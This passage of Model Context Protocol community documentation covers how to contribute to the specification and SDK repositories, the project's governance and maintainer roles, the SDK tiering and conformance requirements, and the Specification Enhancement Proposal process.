[`modelcontextprotocol`](https://github.com/modelcontextprotocol) organization on GitHub. Here are
a few notable sub-projects worth checking out:
| Repository | Contents |
| ----------------------------------------------------------------------------------------------------------- | ------------------------- |
| [`modelcontextprotocol/modelcontextprotocol`](https://github.com/modelcontextprotocol/modelcontextprotocol) | Specification, docs, SEPs |
| [`modelcontextprotocol/typescript-sdk`](https://github.com/modelcontextprotocol/typescript-sdk) | TypeScript/JavaScript SDK |
| [`modelcontextprotocol/python-sdk`](https://github.com/modelcontextprotocol/python-sdk) | Python SDK |
| [`modelcontextprotocol/go-sdk`](https://github.com/modelcontextprotocol/go-sdk) | Go SDK |
| [`modelcontextprotocol/java-sdk`](https://github.com/modelcontextprotocol/java-sdk) | Java SDK |
| [`modelcontextprotocol/kotlin-sdk`](https://github.com/modelcontextprotocol/kotlin-sdk) | Kotlin SDK |
| [`modelcontextprotocol/csharp-sdk`](https://github.com/modelcontextprotocol/csharp-sdk) | C# SDK |
| [`modelcontextprotocol/swift-sdk`](https://github.com/modelcontextprotocol/swift-sdk) | Swift SDK |
| [`modelcontextprotocol/rust-sdk`](https://github.com/modelcontextprotocol/rust-sdk) | Rust SDK |
| [`modelcontextprotocol/ruby-sdk`](https://github.com/modelcontextprotocol/ruby-sdk) | Ruby SDK |
| [`modelcontextprotocol/php-sdk`](https://github.com/modelcontextprotocol/php-sdk) | PHP SDK |
Throughout this guide, **specification repository** refers to
`modelcontextprotocol/modelcontextprotocol`, which contains the protocol spec, this documentation
site, and [Spec Enhancement Proposals (SEPs)](/community/sep-guidelines).
### Project Roles
MCP follows a [governance model](/community/governance) with different levels of responsibility:
* **Contributors** - Anyone who files issues, submits PRs, or participates in discussions (that's
you!)
* **Maintainers** - Steward specific areas like SDKs, documentation, or
[Working Groups](/community/working-interest-groups)
* **Core Maintainers** - Guide overall project direction, review SEPs, and oversee the specification
You can find the current list of maintainers in the
[`MAINTAINERS.md`](https://github.com/modelcontextprotocol/modelcontextprotocol/blob/main/MAINTAINERS.md)
file.
Maintainers are here to help you succeed! Don't hesitate to reach out if you have questions or
need guidance on your contribution.
## Your First Contribution
Start here if you are new to MCP and contributing to its ecosystem.
While we use the specification repository as an example, the key patterns are
applicable to other MCP repos as well.
### Step 1: Set Up Your Environment
Set up your local environment so you can test and validate changes before submitting them.
Click the **Fork** button on the [repository page](https://github.com/modelcontextprotocol/modelcontextprotocol) to create your own copy. This gives you a personal workspace where you can make changes without affecting the main project.
```bash theme={null}
git clone https://github.com/YOUR-USERNAME/modelcontextprotocol.git
cd modelcontextprotocol
```
Replace `YOUR-USERNAME` with your GitHub username.
```bash theme={null}
npm install
```
This installs the tools needed for schema generation, documentation building, and validation.
```bash theme={null}
npm run check
```
This runs TypeScript compilation, schema validation, example validation, documentation link checks, and formatting checks. If everything passes, your environment is good and you're ready to contribute.
If `npm run check` fails, see [Troubleshooting](#troubleshooting) below.
### Step 2: Find Something to Work On
While a lot of the items you might see tracked in the repository can feel intimidating, especially
for newcomers, there are plenty of places where you can start with your first improvements:
1. **Documentation improvements** - Help us fix typos, unclear explanations, broken links, or
incomplete examples
2. **Issues labeled `good first issue`** - Tackle issues tagged in the
[specification repo](https://github.com/modelcontextprotocol/modelcontextprotocol/issues?q=is%3Aissue+is%3Aopen+label%3A%22good+first+issue%22)
as well as our SDK repos
3. **Schema examples** - Add examples to `schema/draft/examples/` to make it easier for developers
to understand protocol primitives
### Step 3: Make Your Change
Create your changes in a dedicated branch.
```bash theme={null}
git checkout -b fix/your-description
```
Use a descriptive branch name that reflects your change, like `fix/typo-in-tools-doc` or `feat/add-example-for-resources`.
Edit the relevant files in your local copy. If you're editing schema files, remember to run `npm run generate:schema` to regenerate the JSON schema and documentation.
```bash theme={null}
npm run check
```
Fix any issues before committing. If you have formatting errors, `npm run format` can auto-fix most of them.
```bash theme={null}
git commit -m "Fix typo in tools documentation"
```
Write a concise message that describes what you changed and why. Reference issue numbers if applicable (e.g., `Fix typo in tools documentation (#123)`).
### Step 4: Submit a Pull Request
When you're ready, push your branch and open a pull request.
```bash theme={null}
git push origin fix/your-description
```
You can use the [GitHub CLI](https://cli.github.com/) to make this process easier:
```bash theme={null}
gh pr create --fill
```
Alternatively, navigate to your fork on GitHub and click **Compare & pull request**.
Provide a clear description of your changes and link any related issues.
Maintainers typically respond within 1-5 business days.
That's it, **congratulations on your first contribution**! Every improvement,
no matter how small, helps make MCP better for everyone.
### What Makes a Good Contribution
Help us review your contribution quickly by following these patterns:
| Harder to Review | Thoughtful and Impactful |
| -------------------------------------------- | ------------------------------------------------ |
| Large PR with unrelated changes | Focused PR addressing one issue |
| Reformatting code without functional changes | Fixing a bug with a clear explanation |
| Vague commit messages ("fixed stuff") | Descriptive commits linking to issues |
| Submitting with failing CI checks | All CI tests pass before requesting review |
| Duplicating existing documentation | Documenting an undocumented feature or edge case |
## Types of Contributions
Different contributions follow different processes depending on their scope.
Not sure which category your change falls into? Ask in the [MCP Contributor
Discord](/community/communication#discord) before starting any significant
work.
### Small Changes (Direct PR)
Simply submit a pull request directly to the repo for:
* Bug fixes and typo corrections
* Documentation improvements, such as bringing clarity to an ambiguous or unclear section
* Adding examples to existing features
* Minor schema fixes that don't materially change the specification or SDK behavior
* Test improvements
### Major Changes (SEP Required)
Anything that changes the MCP specification requires following the
[Specification Enhancement Proposal (SEP)](/community/sep-guidelines) process. This includes, but
is not limited to:
* New protocol features or API methods
* Breaking changes to existing behavior
* Changes to the message format or schema structure
* New interoperability standards
* Governance or process changes
Here are a few concrete examples of what would require following the SEP steps:
* Adding a new RPC method like `tools/execute`
* Changing how authentication and authorization works
* Adding a new capability negotiation field
* Modifying the transport layer specification
## Working with the Specification Repository
Once you've determined [what type of contribution](#types-of-contributions) you're making, here's
how to work with the specification repository.
### Schema Changes
The TypeScript schema (`schema/draft/schema.ts`) is the **source of truth** for the protocol. It
defines every message type, request/response structure, and primitive (tools, resources, prompts)
that clients and servers exchange. SDK implementers across all languages rely on this schema to
build conformant implementations.
When you run `npm run generate:schema`, it generates:
* The JSON schema (`schema/draft/schema.json`) for validation
* The Schema Reference documentation (`docs/specification/draft/schema.mdx`)
To modify the schema:
Make your changes in `schema/draft/schema.ts`.
Add JSON examples in `schema/draft/examples/[TypeName]/` (e.g., `Tool/my-example.json`). Reference them in the schema using `@example` + `@includeCode` JSDoc tags.
```bash theme={null}
npm run generate:schema
```
```bash theme={null}
npm run check
```
### Documentation Changes
Docs are written in [MDX format](https://mdxjs.com/) (Markdown with JSX components) and powered by
[Mintlify](https://mintlify.com/). The `docs/` directory contains:
* `docs/docs/` - Guides and tutorials for getting started and building with MCP
* `docs/specification/` - Formal protocol specification (versioned by date)
Here is how you can contribute to our documentation:
```bash theme={null}
npm run serve:docs
```
This launches a live preview at `http://localhost:3000` with hot reloading.
Edit the relevant `.mdx` files. You can use [Mintlify components](https://www.mintlify.com/docs/components) like ``, ``, ``, and `` for richer formatting.
```bash theme={null}
npm run check:docs
```
This validates formatting, broken links, and other common issues.
### Major Protocol Changes
For significant changes, follow the [SEP process](/community/sep-guidelines). Prior to spending a
lot of time on a spec proposal, make sure to follow these best practices.
Discuss in an [Interest Group](/community/working-interest-groups) or on
[Discord](https://discord.gg/6CSzBmMkjX).
Demonstrate practical application of your idea.
A maintainer from the [maintainer
list](https://github.com/modelcontextprotocol/modelcontextprotocol/blob/main/MAINTAINERS.md)
who will champion your proposal.
Follow the [SEP Guidelines](/community/sep-guidelines).
## Working with the SDK Repositories
MCP maintains official SDKs in multiple languages. Contributions are welcome - whether you're
fixing bugs, improving performance, adding features, or enhancing documentation.
Each SDK has its own repository, maintainers, and contribution guidelines.
Some SDKs are maintained in collaboration with larger partner organizations,
such as Google, Microsoft, JetBrains, and others, so processes may vary
slightly between repositories.
### Before Contributing to an SDK
Before diving into code, follow these steps.
Before starting significant work, open an issue to discuss your approach.
This helps avoid duplicate effort, ensures your contribution aligns with the
SDK's direction, and gives maintainers a chance to provide early feedback.
Find the relevant channel in [Discord](https://discord.gg/6CSzBmMkjX) (e.g.,
`#typescript-sdk-dev`, `#python-sdk-dev`).
Each repository has its own `CONTRIBUTING.md` with specific instructions for
setting up your development environment, coding standards, commit message
conventions, and PR requirements.
All contributions should include appropriate test coverage. Bug fixes should
include a test that reproduces the issue, and new features should have tests
covering the expected behavior. This helps maintain SDK reliability and
prevents regressions.
### SDK Repositories
## Getting Help
### Communication Channels
Got questions or need guidance? The MCP community is here to help.
* **[Discord](/community/communication#discord)** - Real-time discussion with contributors and
maintainers, focused on MCP contributions (not general MCP support)
* **[GitHub Discussions](https://github.com/modelcontextprotocol/modelcontextprotocol/discussions)**
\- Exploration and conversation: **feature requests**, questions, roadmap planning, and proposals
that need input before becoming concrete tasks
* **[GitHub Issues](https://github.com/modelcontextprotocol/modelcontextprotocol/issues)** -
Actionable work: bug reports with reproducible steps, documentation fixes, and tasks that are
well-defined and ready to implement (not feature requests)
This separation helps maintainers focus on work that's ready for implementation while giving ideas
room to develop. If you're unsure whether something is ready to be an issue, start with a
discussion. For a complete guide, see our [Contributor Communication](/community/communication)
documentation.
For protocol discussions, join [Working Group](/community/working-interest-groups) channels like
`#auth-wg` or `#server-identity-wg`. For SDK help, find your language's channel (e.g.,
`#typescript-sdk-dev`).
### Finding a Sponsor for SEPs
A **sponsor** is a Core Maintainer or Maintainer who champions your SEP through the review
process. They provide feedback, help refine your proposal, and present it at Core Maintainer
meetings.
Every SEP needs a sponsor to move forward. SEPs that don't find a sponsor
within 6 months are marked as **dormant**. Dormant SEPs aren't rejected
outright - they can be revived later if a sponsor is found or the proposal is
re-assessed to be needed.
To find a sponsor:
Look at the [maintainer
list](https://github.com/modelcontextprotocol/modelcontextprotocol/blob/main/MAINTAINERS.md)
to find maintainers working in your area.
Tag 1-2 relevant maintainers (don't spam everyone).
Post your PR in the relevant Discord channel to increase visibility.
If no response after 2 weeks, ask in `#general` or reach out to a Core
Maintainer.
Maintainers review open proposals regularly, but response time varies based on complexity and
availability.
## Troubleshooting
Sometimes things don't go as planned - that's completely normal! Here are solutions to common
issues. If you're still stuck, don't hesitate to ask for help in
[Discord](/community/communication#discord). The community is friendly and happy to help you get
unstuck.
### `npm run check` fails
Common causes:
* **Wrong Node.js version** - Ensure you have Node.js 24+
* **Missing dependencies** - Run `npm install` again
* **Schema out of sync** - Run `npm run generate:schema`
* **Formatting issues** - Run `npm run format` to auto-fix
### My PR has been sitting unnoticed for weeks
1. Ensure all CI checks pass
2. Politely ping the desired reviewer in a comment
3. Ask in the relevant Discord channel
4. For urgent issues, reach out to a Core Maintainer
### I can't find a sponsor for my SEP
1. Make sure your idea has been discussed in Discord or an Interest Group first
2. Proposals with demonstrated community interest are more likely to find sponsors
3. Consider whether your change might be too large - could it be split into smaller SEPs?
### My SEP was rejected
Don't take it personally - a SEP rejection doesn't mean your idea was bad. SEPs can be rejected
for many reasons: timing, scope, competing priorities, or simply because the protocol isn't ready
for that change yet. The feedback you receive is valuable and often points toward a path forward.
Rejection is not permanent. You have a few options ahead:
1. **Address the feedback and resubmit** - Often, rejection comes with specific concerns.
Addressing those concerns and resubmitting can be the right path forward.
2. **Discuss in Discord** - Talk with maintainers to better understand the concerns. Sometimes a
brief conversation reveals a simpler path forward.
3. **Try a different approach** - Submit a new SEP that addresses the same problem differently,
incorporating what you learned.
4. **Wait for the right moment** - Circumstances change. New use cases emerge, the community
grows, and priorities shift. An idea rejected today might be welcomed tomorrow.
## Out of Scope
This guide covers contributions to the **core MCP project** - the specification, official SDKs,
and documentation.
Building your own MCP servers, clients, or tools is **not** covered here. For guidance on building
with MCP, see our documentation:
* [Build a Server](/docs/develop/build-server)
* [Build a Client](/docs/develop/build-client)
* [Example Servers](/examples)
If you build something you'd like to share with the community, you can submit it to the
[MCP Registry](/registry/about).
## AI Contributions
We welcome the use of AI tools like Claude or ChatGPT to help with your contributions! If you do
use AI assistance, just let us know in your pull request or issue - a quick note about how you
used it (drafting docs, generating code, brainstorming, etc.) is all we need.
The key is that you understand and can stand behind your contribution:
* **You get it** - You understand what the changes do and can explain them
* **You know why** - You can articulate why the change is needed
* **You've verified it** - You've tested or validated that it works as intended
You can read more about our stance in
[our spec contribution guidelines](https://github.com/modelcontextprotocol/modelcontextprotocol/blob/main/CONTRIBUTING.md#ai-contributions).
## Code of Conduct
All contributors must follow the
[Code of Conduct](https://github.com/modelcontextprotocol/modelcontextprotocol/blob/main/CODE_OF_CONDUCT.md).
We expect respectful, professional, and inclusive interactions across all channels.
## License
By contributing, you agree that your contributions will be licensed under:
* **Code and specifications**: Apache License 2.0
* **Documentation** (excluding specifications): CC-BY 4.0
See the
[LICENSE](https://github.com/modelcontextprotocol/modelcontextprotocol/blob/main/LICENSE) file for
details.
# Governance and Stewardship
Source: https://modelcontextprotocol.io/community/governance
Learn about the Model Context Protocol's governance structure and how to participate in the community
The Model Context Protocol (MCP) follows a formal governance model to ensure transparent decision-making and community participation. This document outlines how the project is organized and how decisions are made.
## General Project Policies
Model Context Protocol has been established as **Model Context Protocol a Series of LF Projects, LLC**. Policies applicable to Model Context Protocol and participants in Model Context Protocol, including guidelines on the usage of trademarks, are located at [https://www.lfprojects.org/policies/](https://www.lfprojects.org/policies/). Governance changes approved as per the provisions of this governance document must also be approved by LF Projects, LLC.
Model Context Protocol participants acknowledge that the copyright in all new contributions will be retained by the copyright holder as independent works of authorship and that no contributor or copyright holder will be required to assign copyrights to the project.
Except as described below, all code and specification contributions to the project must be made using the Apache License, Version 2.0 (available here: [https://www.apache.org/licenses/LICENSE-2.0](https://www.apache.org/licenses/LICENSE-2.0)) (the "Project License").
All outbound code and specifications will be made available under the Project License. The Core Maintainers may approve the use of an alternative open license or licenses for inbound or outbound contributions on an exception basis.
All documentation (excluding specifications) will be made available under Creative Commons Attribution 4.0 International license, available at: [https://creativecommons.org/licenses/by/4.0](https://creativecommons.org/licenses/by/4.0).
## Technical Governance
The MCP project adopts a hierarchical structure, similar to Python, PyTorch, and other open source projects:
| Role | Scope |
| --------------------------- | -------------------------------- |
| **Lead Maintainers (BDFL)** | Final decision authority |
| **Core Maintainers** | Overall project direction |
| **Maintainers** | Working Groups, SDKs, components |
| **Contributors** | Issues, PRs, discussions |
* **Contributors** file issues, make pull requests, and contribute to the project.
* **Maintainers** drive components within the MCP project, such as SDKs, documentation, and Working Groups.
* **Core Maintainers** drive the overall project direction and oversee contributors and maintainers.
* **Lead Maintainers** are the final decision makers (also known as BDFL - Benevolent Dictator for Life).
Together, Maintainers, Core Maintainers, and Lead Maintainers form the **MCP Steering Group**.
All maintainers are expected to have a strong bias towards MCP's design philosophy. Membership in the technical governance process is for individuals, not companies. That is, there are no seats reserved for specific companies, and membership is associated with the person rather than the company employing that person.
### Communication Channels
Technical governance is facilitated through a shared [Discord server](https://discord.gg/6CSzBmMkjX) for all maintainers. Each maintainer group can choose additional communication channels, but all decisions and their supporting discussions must be recorded and made transparently available on the Discord server.
### Maintainers
Maintainers are responsible for [Working Groups or Interest Groups](/community/working-interest-groups) within the MCP project. These generally are independent repositories such as language-specific SDKs, but can also extend to subdirectories of a repository, such as the MCP documentation.
Maintainers may adopt their own rules and procedures for making decisions. They are expected to make decisions for their respective projects independently, but can defer or escalate to the Core Maintainers when needed.
**Maintainer responsibilities:**
* Thoughtful and productive engagement with community contributors
* Maintaining and improving their respective area of the MCP project
* Supporting documentation, roadmaps, and other adjacent parts of the MCP project
* Presenting ideas from the community to Core Maintainers
Maintainers are encouraged to propose additional maintainers when needed. Maintainers can only be appointed and removed by Core Maintainers or Lead Maintainers at any time and without reason.
Maintainers have write and/or admin access to their respective repositories.
### Core Maintainers
The Core Maintainers are expected to have a deep understanding of the Model Context Protocol and its specification. Their responsibilities include:
* Designing, reviewing, and steering the evolution of the MCP specification, as well as all other parts of the MCP project
* Articulating a cohesive long-term vision for the project
* Mediating and resolving contentious issues with fairness and transparency, seeking consensus where possible while making decisive choices when necessary
* Appointing or removing Maintainers
* Stewardship of the MCP project in the best interest of MCP
The Core Maintainers as a group have the power to veto any decisions made by Maintainers by majority vote. The Core Maintainers have power to resolve disputes as they see fit. The Core Maintainers should publicly articulate their decision-making. The core group is responsible for adopting their own procedures for making decisions.
Core Maintainers generally have write and admin access to all MCP repositories, but should use the same contribution (usually pull-request) mechanism as outside contributors. Exceptions can be made based on security considerations.
### Lead Maintainers (BDFL)
MCP has two Lead Maintainers: Justin Spahr-Summers and David Soria Parra. Lead Maintainers can veto any decision by Core Maintainers or Maintainers. This model is also commonly known as Benevolent Dictator for Life (BDFL) in the open source community.
The Lead Maintainers should publicly articulate their decision-making and give clear reasoning for their decisions. Lead Maintainers are part of the Core Maintainer group.
The Lead Maintainers are responsible for confirming or removing Core Maintainers.
Lead Maintainers are administrators on all infrastructure for the MCP project where possible. This includes but is not restricted to all communication channels, GitHub organizations, and repositories.
### Decision Process
The Core Maintainer group meets every two weeks to discuss and vote on proposals, as well as discuss any topics needed. The shared Discord server can be used to discuss and vote on smaller proposals if needed.
The Lead Maintainer, Core Maintainer, and Maintainer group should attempt to meet in person every three to six months.
## Processes
Core Maintainers and Lead Maintainers are responsible for all aspects of Model Context Protocol, including documentation, issues, suggestions for content, and all other parts under the [MCP project](https://github.com/modelcontextprotocol). Maintainers are responsible for documentation, issues, and suggestions of content for their area of the MCP project, but are encouraged to partake in general maintenance of the MCP projects.
Maintainers, Core Maintainers, and Lead Maintainers should use the same contribution process as external contributors, rather than making direct changes to repos. This provides insight into intent and opportunity for discussion.
### Working Groups and Interest Groups
MCP collaboration and contributions are organized around two structures: [Working Groups and Interest Groups](/community/working-interest-groups).
* **Interest Groups** identify and articulate problems that MCP should address through open discussions
* **Working Groups** develop concrete solutions by producing deliverables like SEPs or implementations
For details on how to create, participate in, and facilitate these groups, see the [Working and Interest Groups](/community/working-interest-groups) documentation.
### Specification Enhancement Proposals (SEPs)
Proposed changes to the specification must be submitted as [Specification Enhancement Proposals (SEPs)](/community/sep-guidelines). SEPs are the primary mechanism for proposing major new features, collecting community input, and documenting design decisions.
For the complete SEP process, format requirements, and status workflow, see the [SEP Guidelines](/community/sep-guidelines).
### Maintenance Responsibilities
Components without dedicated maintainers (such as documentation) fall under Core Maintainer responsibility. These follow standard contribution guidelines through pull requests, with maintainers handling reviews and escalating to Core Maintainer review for any significant changes.
Core Maintainers and Maintainers are encouraged to improve any part of the MCP project, regardless of formal maintenance assignments.
## Communication
### Core Maintainer Meetings
The Core Maintainer group meets on a bi-weekly basis to discuss proposals and the project. Notes on proposals should be made public. The Core Maintainer group will strive to meet in person every 3-6 months.
### Public Chat
The MCP project maintains a [public Discord server](https://discord.gg/6CSzBmMkjX) with open chats for interest groups. The MCP project may have private channels for certain communications.
## Nominating, Confirming, and Removing Maintainers
### Principles
* Membership in maintainer groups is given to **individuals** on merit basis after they demonstrated strong expertise of their area of work through contributions, reviews, and discussions and are aligned with the overall MCP direction.
* For membership in the **Maintainer** group, the individual has to demonstrate strong and continued alignment with the overall MCP principles.
* No term limits for Maintainers or Core Maintainers.
* Light criteria of moving Working Group or sub-project maintenance to 'emeritus' status if they don't actively participate over long periods of time. Each maintainer group may define the inactive period that's appropriate for their area.
* The membership is for an individual, not a company.
### Nomination and Removal
* The Lead Maintainers are responsible for adding and removing Core Maintainers.
* Core Maintainers are responsible for adding and removing Maintainers. They will take the consideration of existing Maintainers into account.
* If a Working Group or Interest Group with 2+ existing Maintainers unanimously agrees to add additional Maintainers (up to a maximum of 5), they may do so without Core Maintainer review.
### Nomination Process
If a Maintainer (or Core/Lead Maintainer) wishes to propose a nomination for the Core/Lead Maintainers' consideration, they should follow this process:
1. Collect evidence for the nomination. This will generally come in the form of a history of merged PRs on the repositories for which maintainership is being considered.
2. Discuss among Maintainers of the relevant group(s) as to whether they would be supportive of approving the nomination.
3. DM a Community Moderator or Core Maintainer to create a private channel in Discord, in the format `nomination-{name}-{group}`. Add all Core Maintainers, Lead Maintainers, and co-Maintainers on the relevant group.
4. Provide context for the individual under nomination. See below for suggestions on what to include.
5. Create a Discord Poll and ask Core/Lead Maintainers to vote Yes/No on the nomination. Reaching consensus is encouraged though not required.
6. After Core/Lead Maintainers discuss and/or vote, if the nomination is favorable, relevant members with permissions to update GitHub and Discord roles will add the nominee to the appropriate groups. The nominator should announce the new maintainership in the relevant Discord channel.
7. The temporary Discord channel will be deleted a week later.
**Suggestions for nomination context:**
* GitHub profile link, LinkedIn profile link, Discord username
* For what group(s) are you nominating the individual for maintainership
* Whether the group(s) agree that this person should be elevated to maintainership
* Description of their contributions to date (including links to most substantial contributions)
* Description of expected contributions moving forward (e.g., Are they eager to be a Maintainer? Will they have capacity to do so?)
* Other context about the individual (e.g., current employer, motivations behind MCP involvement)
* Anything else you think may be relevant to consider for the nomination
## Current Core Maintainers
* Peter Alexander
* Caitie McCaffrey
* Kurtis Van Gent
* Paul Carleton
* Nick Cooper
* Nick Aldridge
* Che Liu
* Den Delimarsky
## Current Maintainers and Working Groups
Refer to [the maintainer list](https://github.com/modelcontextprotocol/modelcontextprotocol/blob/main/MAINTAINERS.md).
# SDK Tiering System
Source: https://modelcontextprotocol.io/community/sdk-tiers
Feature completeness, protocol support, and maintenance commitment levels for Model Context Protocol SDKs
The MCP SDK Tiering System establishes clear expectations for feature completeness, protocol support, and maintenance commitments across official and community-driven SDKs. This helps developers choose the right SDK for their needs and provides SDK maintainers with a clear path to improving adoption expectations.
**Key dates:**
* **January 23, 2026**: Conformance tests available
* **February 23, 2026**: Official SDK tiering published
Between January 23 and February 23, SDK maintainers can work with the
Conformance Testing working group to adopt the tests and set up GitHub issue
tracking with the standardized labels defined below.
## Overview
SDKs are classified into three tiers based on feature completeness, maintenance commitments, and documentation quality:
* **Tier 1**: Fully supported SDKs with complete protocol implementation, including all
non-experimental features and optional capabilities like sampling and elicitation
* **Tier 2**: Actively-maintained SDKs working toward full protocol specification support
* **Tier 3**: Experimental, partially implemented, or specialized SDKs
Experimental features (such as Tasks) and protocol extensions (such as MCP Apps) are not required
for any tier.
## Tier Requirements
| Requirement | Tier 1: Fully Supported | Tier 2: Commitment to Full Support | Tier 3: Experimental |
| --------------------------- | ---------------------------------------------------------------------------------------- | ---------------------------------------------------------------- | ---------------------- |
| **Conformance Tests** | 100% pass rate | 80% pass rate | No minimum |
| **New Protocol Features** | Before new spec version release, timeline agreed per release based on feature complexity | Within 6 months | No timeline commitment |
| **Issue Triage** | Within 2 business days | Within a month | No requirement |
| **Critical Bug Resolution** | Within 7 days | Within two weeks | No requirement |
| **Stable Release** | Required with clear versioning | At least one stable release | Not required |
| **Documentation** | Comprehensive with examples for all features | Basic documentation covering core features | No minimum |
| **Dependency Policy** | Published update policy | Published update policy | Not required |
| **Roadmap** | Published roadmap | Published plan toward Tier 1 or explanation for remaining Tier 2 | Not required |
**Issue Triage** means labeling and determining whether an issue is valid, not resolving the issue.
**Critical Bug** refers to P0 issues (see [Priority labels](#priority-only-if-actionable) for
detailed criteria).
**Stable Release** is a published version explicitly marked as production-ready (e.g., version `1.0.0`
or higher without pre-release identifiers like `-alpha`, `-beta`, or `-rc`).
**Clear Versioning** means following idiomatic versioning patterns with documented
breaking change policies, so users can understand compatibility expectations when upgrading.
**Roadmap** outlines concrete steps and work items that track implementation of required MCP
specification components (non-experimental features and optional capabilities as described in
[Conformance Testing](#conformance-testing)), giving users visibility into upcoming feature support.
## Conformance Testing
All SDKs are evaluated using [automated conformance tests](https://github.com/modelcontextprotocol/conformance)
that validate protocol support against the published specifications. SDKs receive a conformance score
based on test results:
* **Tier 1**: 100% conformance required
* **Tier 2**: 80% conformance required
* **Tier 3**: No minimum requirement
Conformance scores are calculated against **applicable required tests** only:
* Tests for the specification version the SDK targets
* Excluding tests marked as pending or skipped
* Excluding tests for experimental features
* Excluding legacy backward-compatibility tests (unless the SDK claims legacy support)
Conformance testing validates that SDKs correctly implement the protocol by running standardized test
scenarios and checking protocol message exchanges. See [Tier Relegation](#tier-relegation) for how
temporary test failures are handled.
## Tier Advancement
SDK maintainers can request tier advancement by:
1. Self-assessing against tier requirements
2. Opening an issue in the [modelcontextprotocol/modelcontextprotocol](https://github.com/modelcontextprotocol/modelcontextprotocol) repository with supporting evidence
3. Passing automated conformance testing
4. Receiving approval from SDK Working Group maintainers
The SDK Working Group reviews advancement requests and makes final tier assignments.
## Tier Relegation
An SDK may be moved to a lower tier if existing conformance tests on the latest stable release fail
continuously for 4 weeks:
* **Tier 1 → Tier 2**: Any conformance test fails
* **Tier 2 → Tier 3**: More than 20% of conformance tests fail
## Issue Triage Labels
SDK repositories must use consistent labels to enable automated reporting on issue handling metrics.
Tier calculations use these metrics to measure triage response times (time from issue creation to
first label) and critical bug resolution times (time from P0 label to issue close).
### Type (pick one)
| Label | Description |
| ------------- | ----------------------------- |
| `bug` | Something isn't working |
| `enhancement` | Request for new feature |
| `question` | Further information requested |
Repositories using [GitHub's native issue types](https://docs.github.com/en/issues/tracking-your-work-with-issues/using-issues/managing-issue-types-in-an-organization)
satisfy this requirement without needing type labels.
### Status (pick one)
Use these exact label names across all repositories to enable consistent reporting and analysis.
| Label | Description |
| -------------------- | ------------------------------------------------------- |
| `needs confirmation` | Unclear if still relevant |
| `needs repro` | Insufficient information to reproduce |
| `ready for work` | Has enough information to start |
| `good first issue` | Good for newcomers |
| `help wanted` | Contributions welcome from those familiar with codebase |
### Priority (only if actionable)
| Label | Description |
| ----- | --------------------------------------------------------------- |
| `P0` | Critical: core functionality failures or high-severity security |
| `P1` | Significant bug affecting many users |
| `P2` | Moderate issues, valuable feature requests |
| `P3` | Nice to haves, rare edge cases |
**P0 (Critical)** issues are:
* **Security vulnerabilities** with CVSS score ≥ 7.0 (High or Critical severity)
* **Core functionality failures** that prevent basic MCP operations: connection establishment,
message exchange, or use of core primitives (tools, resources, prompts)
# SEP Guidelines
Source: https://modelcontextprotocol.io/community/sep-guidelines
Specification Enhancement Proposal (SEP) guidelines for proposing changes to the Model Context Protocol
## What is a SEP?
SEP stands for Specification Enhancement Proposal. A SEP is a design document providing information to the MCP community, or describing a new feature for the Model Context Protocol or its processes. The SEP should provide a concise technical specification of the feature and a rationale for the feature.
SEPs are the primary mechanism for proposing major new features, collecting community input on an issue, and documenting the design decisions that have gone into MCP. The SEP author is responsible for building consensus within the community and documenting dissenting opinions.
SEPs are maintained as markdown files in the [`seps/` directory](https://github.com/modelcontextprotocol/modelcontextprotocol/tree/main/seps) of the specification repository. Their revision history serves as the historical record of the feature proposal.
## When to Write a SEP
The SEP process is reserved for changes that are substantial enough to require broad community discussion, a formal design document, and a historical record. A regular GitHub pull request is often more appropriate for smaller changes.
**Write a SEP if your change involves:**
* **A new feature or protocol change** - Adding, modifying, or removing features in the protocol (new API methods, message format changes, interoperability standards)
* **A breaking change** - Any change that is not backwards-compatible
* **A governance or process change** - Altering decision-making or contribution guidelines
* **A complex or controversial topic** - Changes likely to have multiple valid solutions or generate significant debate
**Skip the SEP process for:**
* Bug fixes and typo corrections
* Documentation clarifications
* Adding examples to existing features
* Minor schema fixes that don't change behavior
Not sure? Ask in [Discord](https://discord.gg/6CSzBmMkjX) before starting significant work.
## SEP Types
There are three kinds of SEP:
1. **Standards Track** - Describes a new feature or implementation for the Model Context Protocol, or an interoperability standard supported outside the core specification.
2. **Informational** - Describes a design issue or provides guidelines/information to the community without proposing a new feature.
3. **Process** - Describes a process surrounding MCP or proposes a change to a process (like this document).
## SEP Workflow
```mermaid theme={null}
flowchart TD
Idea["Idea"]
AwaitingSponsor{"Awaiting Sponsor (up to 6 months)"}
Draft["Draft"]
Dormant["Dormant (no sponsor)"]
Withdrawn["Withdrawn (by author)"]
InReview["In-Review"]
Decision{"Core Maintainers decide"}
Accepted["Accepted"]
Rejected["Rejected"]
Final["Final"]
Idea -->|"Submit PR with SEP file"| AwaitingSponsor
AwaitingSponsor --> Draft
AwaitingSponsor --> Dormant
AwaitingSponsor --> Withdrawn
Draft -->|"Sponsor reviews"| InReview
InReview --> Decision
Decision --> Accepted
Decision --> Rejected
Accepted -->|"Reference implementation complete"| Final
```
### Step-by-Step Process
1. **Draft your SEP** as a markdown file named `0000-your-feature-title.md`, using `0000` as a placeholder. Follow the [SEP format](#sep-format) below.
2. **Create a pull request** adding your SEP file to the `seps/` directory in the [specification repository](https://github.com/modelcontextprotocol/modelcontextprotocol).
3. **Update the SEP number**: Once your PR is created, rename the file using the PR number (e.g., PR #1850 becomes `1850-your-feature-title.md`) and update the SEP header.
4. **Find a Sponsor**: Tag a Core Maintainer or Maintainer from [the maintainer list](https://github.com/modelcontextprotocol/modelcontextprotocol/blob/main/MAINTAINERS.md). Choose someone whose area relates to your proposal. Tips:
* Tag 1-2 relevant maintainers, not everyone
* Share your PR in the relevant Discord channel
* If no response after 2 weeks, ask in `#general`
5. **Sponsor assigns themselves**: When a sponsor agrees, they assign themselves to the PR and update the SEP status to `draft`.
6. **Informal review**: The sponsor reviews the proposal and may request changes. Discussion happens in PR comments.
7. **Formal review**: When ready, the sponsor updates the status to `in-review`. The SEP enters formal review by Core Maintainers (meetings every two weeks).
8. **Resolution**: The SEP may be `accepted`, `rejected`, or returned for revision. The sponsor updates the status.
9. **Finalization**: Once accepted, the reference implementation must be completed. When complete and incorporated into the specification, the sponsor updates the status to `final`.
### SEP Statuses
| Status | Meaning |
| ------------ | ------------------------------------------------ |
| `draft` | Has a sponsor, undergoing informal review |
| `in-review` | Ready for formal Core Maintainer review |
| `accepted` | Approved, awaiting reference implementation |
| `rejected` | Declined by Core Maintainers |
| `withdrawn` | Author withdrew the proposal |
| `final` | Complete with reference implementation |
| `superseded` | Replaced by a newer SEP |
| `dormant` | No sponsor found within 6 months; can be revived |
